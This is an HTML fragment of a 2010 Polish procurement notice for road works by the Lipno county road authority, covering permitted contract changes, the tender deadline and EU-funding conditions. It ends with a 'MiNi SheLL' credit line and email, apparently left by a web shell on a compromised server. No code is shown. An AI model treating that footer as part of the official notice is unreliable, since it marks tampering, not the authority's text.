<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia zawiera wzór  załączonej umowy.
2.	Zakazuje się istotnych zmian postanowień zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, za wyjątkiem okoliczności przewidzianych w SIWZ.
3.	Przewiduje się zmiany  istotnych postanowień zawartej umowy z uwagi na ewentualne następujące okoliczności: 
.	zmiana terminu wykonania i odbioru wykonanych robót ze względu na niesprzyjające warunki atmosferyczne do wykonywania robót drogowych, a związane z okresem jesienno-zimowym, uniemożliwiające wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązujących przepisów;
.	wystąpienie okoliczności powodujących konieczność zmiany osób które będą uczestniczyć w wykonaniu przedmiotu zamówienia (przewidzianych w ofercie), na osoby o co najmniej równoważnych kwalifikacjach i doświadczeniu;
.	w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie wszczęcia postępowania przetargowego, a które są niezbędne dla prawidłowej realizacji zamówienia
a)	Zamawiający dopuszcza zmianę terminu realizacji zamówienia przy wystąpieniu istotnych okoliczności po stronie Zamawiającego,
b)	 Zamawiający nie dopuszcza zmiany terminu realizacji zamówienia z winy Wykonawcy. 
4.	Wszelkie zmiany do umowy wymagają zgody obydwu stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lipnowski.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Lipnie
Ul. Wojska Polskiego 8
87-600 Lipno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Lipnie
Ul. Wojska Polskiego 8
87-600 Lipno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com